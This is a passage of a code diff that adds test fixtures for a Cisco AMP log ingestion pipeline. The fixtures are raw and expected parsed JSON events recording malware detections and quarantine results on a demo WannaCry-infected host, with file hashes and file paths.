+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":802000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867976","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
\ No newline at end of file
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp6.ndjson.log-expected.json b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp6.ndjson.log-expected.json
new file mode 100644
index 00000000000..c2aa4b46070
--- /dev/null
+++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp6.ndjson.log-expected.json
@@ -0,0 +1,4310 @@
+{
+    "expected": [
+        {
+            "@timestamp": "2021-01-14T14:41:05.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:10.094001496Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847664\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419229331435815000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6419229327140847664",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T14:41:05.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:10.094015339Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847663\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419229331435815000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Delete pending",
+                        "error_code": 3221225558
+                    },
+                    "detection_id": "6419229327140847663",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T14:41:05.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:10.094017473Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847662\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419229331435815000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6419229327140847662",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T14:41:05.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:10.094019533Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847661\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419229331435815000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6419229327140847661",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T14:41:05.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:10.094021497Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847659\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419229331435815000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Cannot delete",
+                        "error_code": 3221225761
+                    },
+                    "detection_id": "6419229327140847659",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T14:41:05.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:10.094023420Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847657\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419229331435815000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Delete pending",
+                        "error_code": 3221225558
+                    },
+                    "detection_id": "6419229327140847657",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T14:41:05.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:10.094025345Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":572000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419229331435814973\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419229331435815000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419229331435814973",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "tasksche.exe",
+                "pid": 1008,
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "@timestamp": "2021-01-14T14:41:05.000Z",
+            "file": {
+                "name": "u.wnry",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry",
+                "hash": {
+                    "sha1": "45356a9dd616ed7161a3b9192e2f318d0ab5ad10",
+                    "sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25",
+                    "md5": "7bf2b57f2a205768755c07f238fb32cc"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25",
+                    "7bf2b57f2a205768755c07f238fb32cc",
+                    "45356a9dd616ed7161a3b9192e2f318d0ab5ad10"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:10.094027258Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":120000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"},\"parent\":{\"process_id\":1008,\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419229331435815000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Ransom:Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
